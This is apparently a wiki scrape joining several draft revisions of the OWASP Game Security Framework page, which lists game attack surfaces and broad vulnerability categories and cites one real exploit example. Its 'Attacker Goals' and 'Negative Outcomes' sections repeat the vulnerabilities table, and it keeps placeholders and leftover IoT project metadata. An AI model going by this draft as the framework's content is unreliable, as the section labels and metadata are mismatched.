* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Defenses =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Common Game Security Defenses ==

Table Here

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}
= Examples =

== Real-world Examples of Gaming Vulnerabilities==

''Vulnerability 1''

{| class="wikitable"
! style="font-weight: bold;" | Vulnerabilty Name
! style="font-weight: bold;" | Description
! style="font-weight: bold;" | Surface Area
! style="font-weight: bold;" | Attacker Goal
! style="font-weight: bold;" | Negative Outcome
! style="font-weight: bold;" | Tester Tool
! style="font-weight: bold;" | Defense
! Ref
! Genre
|-
| Local Resource Modification, Client-side Logic Flaw
| In 2015 The Division experienced an exploit that allowed an attacker to switch weapons rapidly, applying weapon buffs in a stacking manner, with no cap.
| Game Client
| Unfair Player Advantage
| Player Anger, Lost Revenue
| Game Client
| Cryptographic Integrity Checks on Game Client
| http://www.gamesradar.com/theres-a-division-damage-stacking-glitch-if-youve-got-fast-fingers/
| 3PS/1PS/MMO
|-
| colspan="9" style="text-align: center;" | The attacker attacked and edited the LOCAL GAME CLIENT (Attack Surface), which had a LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability), which allowed her to ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal), ultimately leading to an UNHAPPY PLAYER BASE (Negative Outcome) and DECLINING GAME REVENUE (Negative Outcome) due to cheating.
|-
|
|
|
|
|
|
|
|
|
|}
''Template 1''

: "The attacker attacked and edited the <code>LOCAL GAME CLIENT (Attack Surface)</code>, which had a <code>LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability)</code>, which allowed her to <code>ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal)</code>, ultimately leading to an <code>UNHAPPY PLAYER BASE (Negative Outcome)</code> and <code>DECLINING GAME REVENUE (Negative Outcome)</code> due to cheating.”

== ==
{{Social Media Links}}

= Community =

[https://www.iamthecavalry.org/ I Am The Cavalry]

A global grassroots organization that is focused on issues where computer security intersects public safety and human life.

Their areas of focus include:
* Medical devices
* Automobiles
* Home Electronics
* Public Infrastructure
== ==
[http://builditsecure.ly BuildItSecure.ly]

A project focused on helping small business connect with security researchers to aid in securing their IoT-based products before going market.

Their goals include:
* Focus effort towards small business
* Build partnerships
* Coordinate efforts
* Curate informational resources
* Present research
== ==
[https://otalliance.org Online Trust Alliance]

Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.

Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.
== ==
[https://allseenalliance.org/framework AllSeen Alliance]

The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.
== ==
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]

The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.
== ==
[http://securingsmartcities.org/ Securing Smart Cities]

Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.

===Talks===

RSA Conference San Francisco <br>
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br>
Daniel Miessler, Practice Principal <br>
April 21, 2015 <br>
--- <br>
Defcon 23 <br>
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br>
Daniel Miessler <br>
August 6-9, 2015

===Podcasts===

* [http://iotpodcast.com/ The Internet of Things Podcast]
* [http://www.iot-inc.com/ IoT Inc]
* [https://craigsmith.net/category/podcast/ IoT This Week]
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]

===IoT Conferences===

* [http://www.iotevents.org Internet of Things Events]

Conference Call for Papers
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]
|}

= Testing Tools =

== Commonly Used Game Hacking Tools ==

== ==
{{Social Media Links}}

=Project About=

{{Template:Project About
| project_name =OWASP Internet of Things Project
| project_description =
| project_license =CC-BY 3.0 for documentation and GPLv3 for code.
| leader_name1 = Daniel Miessler
| leader_email1 =
| leader_username1 =
| leader_name2 =Craig Smith
| leader_email2 =
| leader_username2 =
| contributor_name1 = Justin Klein Keane]
| contributor_email1 =
| contributor_username1 = Justin_C._Klein_Keane
| contributor_name2 = Yunsoul
| contributor_email2 =
| contributor_username2 = Yunsoul
| mailing_list_name =
| links_url1 =
| links_name1 =
| links_url1 =
| links_name1 =
}}

__NOTOC__ <headertabs />

[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]]

OWASP Game Security Framework Project

2017-01-18T02:14:54Z

Jason Haddix: /* What is the OWASP Game Security Framework? */

= About the Project =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

==OWASP Game Security Framework (GSF)==

'''The OWASP Game Security Framework (GSF) represents a modular approach to understanding the security issues that surround video game ecosystems.'''

''The framework is broken into three main concepts / sections:''

'''1. Identifying and clustering the components of risk within the overall game security space, and then giving instances of each component.'''

''Components include the following:''

* '''Attack Surfaces''': the various surface areas that can be attacked by attackers in order to cause harm to the gaming ecosystem.

* '''Vulnerabilities''': the specific weaknesses in design or implementation that allows attackers to successfully target a given game.

* '''Attacker Goals''': a list of the reasons that an attacker might want to attack a given game.

* '''Negative Outcomes''': a collection of ways that the gaming company could ultimately be impacted negatively by attacks to its game and associated infrastructure.

'''2. A natural language semantic structure for thinking about and articulating game security issues, which uses the modular risk components as sentence structure.'''

''Example:''

: "The attacker attacked and edited the <code>LOCAL GAME CLIENT (Attack Surface)</code>, which had a <code>LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability)</code>, which allowed her to <code>ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal)</code>, ultimately leading to an <code>UNHAPPY PLAYER BASE (Negative Outcome)</code> and <code>DECLINING GAME REVENUE (Negative Outcome)</code> due to cheating.”

Using this structure, security testers can clearly communicate the various aspects of a game security issue to many different types of stakeholder—from pentesting peers to business executives in the gaming industry.

'''3. Examples of real-world examples of previous attacks against games, and how the attacks map to the GSF framework components.'''

==Licensing==
The OWASP Game Security Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the OWASP Game Security Framework? ==

The goal of the OWASP Game Security Framework is to provide a structure for discussing the various aspects around the security of video games.

The target audience for the project includes:

* Gamers
* QA
* Game designers
* Penetration testers
* Gaming executives
* Anyone else with a vested interest in game security

== Project Leaders ==

* Jason Haddix
* Daniel Miessler

== Contributors ==
* LFG

== Related Projects ==

* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]

| valign="top" style="padding-left:25px;width:200px;" |

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==

COMING SOON

== News and Events ==
* ''[JANUARY 2017]'' Doing a complete redesign of the project.

==Classifications==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]
|}

|}

= Game Attack Surfaces =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Attack Surfaces ==

The following is a list of the attack surfaces that can be found in video games of various types.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* The locally running game client that is accessible to the gamer because it's running on his/her machine.
|-
| '''Game Network Traffic'''
|
* The network which game traffic traverses in order to reach the game's server or peers who are playing the game.
|-
| '''Game Server'''
|
* The game server that is hosting the instance that gamers connect to in order to play the game.
|-
| '''Game Economy'''
|
* The economic system that exists within the game.
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Attack Surfaces Section? ==

This section provides an overview of the various places an attacker can target to harm a given game infrastructure.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==
* Coming Soon

== News and Events ==
* Coming Soon

|}

= Game Vulnerabilities =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Vulnerability Name
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Jason Haddix

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Attacker Goals =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Negative Outcomes =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Defenses =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Common Game Security Defenses ==

Table Here

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}
= Examples =

{| class="wikitable"
! style="font-weight: bold;" | Vulnerabilty Name
! style="font-weight: bold;" | Description
! style="font-weight: bold;" | Surface Area
! style="font-weight: bold;" | Attacker Goal
! style="font-weight: bold;" | Negative Outcome
! style="font-weight: bold;" | Tester Tool
! style="font-weight: bold;" | Defense
! Ref
! Genre
|-
| Local Resource Modification, Client-side Logic Flaw
| In 2015 The Division experienced an exploit that allowed an attacker to switch weapons rapidly, applying weapon buffs in a stacking manner, with no cap.
| Game Client
| Unfair Player Advantage
| Player Anger, Lost Revenue
| Game Client
| Cryptographic Integrity Checks on Game Client
| http://www.gamesradar.com/theres-a-division-damage-stacking-glitch-if-youve-got-fast-fingers/
| 3PS/1PS/MMO
|-
|}

== ==
{{Social Media Links}}

= Community =

[https://www.iamthecavalry.org/ I Am The Cavalry]

A global grassroots organization that is focused on issues where computer security intersects public safety and human life.

Their areas of focus include:
* Medical devices
* Automobiles
* Home Electronics
* Public Infrastructure
== ==
[http://builditsecure.ly BuildItSecure.ly]

A project focused on helping small business connect with security researchers to aid in securing their IoT-based products before going market.

Their goals include:
* Focus effort towards small business
* Build partnerships
* Coordinate efforts
* Curate informational resources
* Present research
== ==
[https://otalliance.org Online Trust Alliance]

Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.

Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.
== ==
[https://allseenalliance.org/framework AllSeen Alliance]

The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.
== ==
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]

The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.
== ==
[http://securingsmartcities.org/ Securing Smart Cities]

Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.

===Talks===

RSA Conference San Francisco <br>
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br>
Daniel Miessler, Practice Principal <br>
April 21, 2015 <br>
--- <br>
Defcon 23 <br>
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br>
Daniel Miessler <br>
August 6-9, 2015

===Podcasts===

* [http://iotpodcast.com/ The Internet of Things Podcast]
* [http://www.iot-inc.com/ IoT Inc]
* [https://craigsmith.net/category/podcast/ IoT This Week]
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]

===IoT Conferences===

* [http://www.iotevents.org Internet of Things Events]

Conference Call for Papers
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]
|}

= Testing Tools =

== Commonly Used Game Hacking Tools ==

== ==
{{Social Media Links}}

=Project About=

{{Template:Project About
| project_name =OWASP Internet of Things Project
| project_description =
| project_license =CC-BY 3.0 for documentation and GPLv3 for code.
| leader_name1 = Daniel Miessler
| leader_email1 =
| leader_username1 =
| leader_name2 =Craig Smith
| leader_email2 =
| leader_username2 =
| contributor_name1 = Justin Klein Keane]
| contributor_email1 =
| contributor_username1 = Justin_C._Klein_Keane
| contributor_name2 = Yunsoul
| contributor_email2 =
| contributor_username2 = Yunsoul
| mailing_list_name =
| links_url1 =
| links_name1 =
| links_url1 =
| links_name1 =
}}

__NOTOC__ <headertabs />

[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]]

OWASP Game Security Framework Project

2017-01-18T02:14:09Z

Jason Haddix:

= About the Project =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

==OWASP Game Security Framework (GSF)==

'''The OWASP Game Security Framework (GSF) represents a modular approach to understanding the security issues that surround video game ecosystems.'''

''The framework is broken into three main concepts / sections:''

'''1. Identifying and clustering the components of risk within the overall game security space, and then giving instances of each component.'''

''Components include the following:''

* '''Attack Surfaces''': the various surface areas that can be attacked by attackers in order to cause harm to the gaming ecosystem.

* '''Vulnerabilities''': the specific weaknesses in design or implementation that allows attackers to successfully target a given game.

* '''Attacker Goals''': a list of the reasons that an attacker might want to attack a given game.

* '''Negative Outcomes''': a collection of ways that the gaming company could ultimately be impacted negatively by attacks to its game and associated infrastructure.

'''2. A natural language semantic structure for thinking about and articulating game security issues, which uses the modular risk components as sentence structure.'''

''Example:''

: "The attacker attacked and edited the <code>LOCAL GAME CLIENT (Attack Surface)</code>, which had a <code>LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability)</code>, which allowed her to <code>ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal)</code>, ultimately leading to an <code>UNHAPPY PLAYER BASE (Negative Outcome)</code> and <code>DECLINING GAME REVENUE (Negative Outcome)</code> due to cheating.”

Using this structure, security testers can clearly communicate the various aspects of a game security issue to many different types of stakeholder—from pentesting peers to business executives in the gaming industry.

'''3. Examples of real-world examples of previous attacks against games, and how the attacks map to the GSF framework components.'''

==Licensing==
The OWASP Game Security Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the OWASP Game Security Framework? ==

The goal of the OWASP Game Security Framework is to provide a structure for discussing the various aspects around the security of video games.

The target audience for the project includes:

* Gamers
* Game designers
* Penetration testers
* Gaming executives
* Anyone else with a vested interest in game security

== Project Leaders ==

* Jason Haddix
* Daniel Miessler

== Contributors ==
* LFG

== Related Projects ==

* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]

| valign="top" style="padding-left:25px;width:200px;" |

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==

COMING SOON

== News and Events ==
* ''[JANUARY 2017]'' Doing a complete redesign of the project.

==Classifications==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]
|}

|}

= Game Attack Surfaces =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Attack Surfaces ==

The following is a list of the attack surfaces that can be found in video games of various types.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* The locally running game client that is accessible to the gamer because it's running on his/her machine.
|-
| '''Game Network Traffic'''
|
* The network which game traffic traverses in order to reach the game's server or peers who are playing the game.
|-
| '''Game Server'''
|
* The game server that is hosting the instance that gamers connect to in order to play the game.
|-
| '''Game Economy'''
|
* The economic system that exists within the game.
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Attack Surfaces Section? ==

This section provides an overview of the various places an attacker can target to harm a given game infrastructure.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==
* Coming Soon

== News and Events ==
* Coming Soon

|}

= Game Vulnerabilities =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Vulnerability Name
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Jason Haddix

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Attacker Goals =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

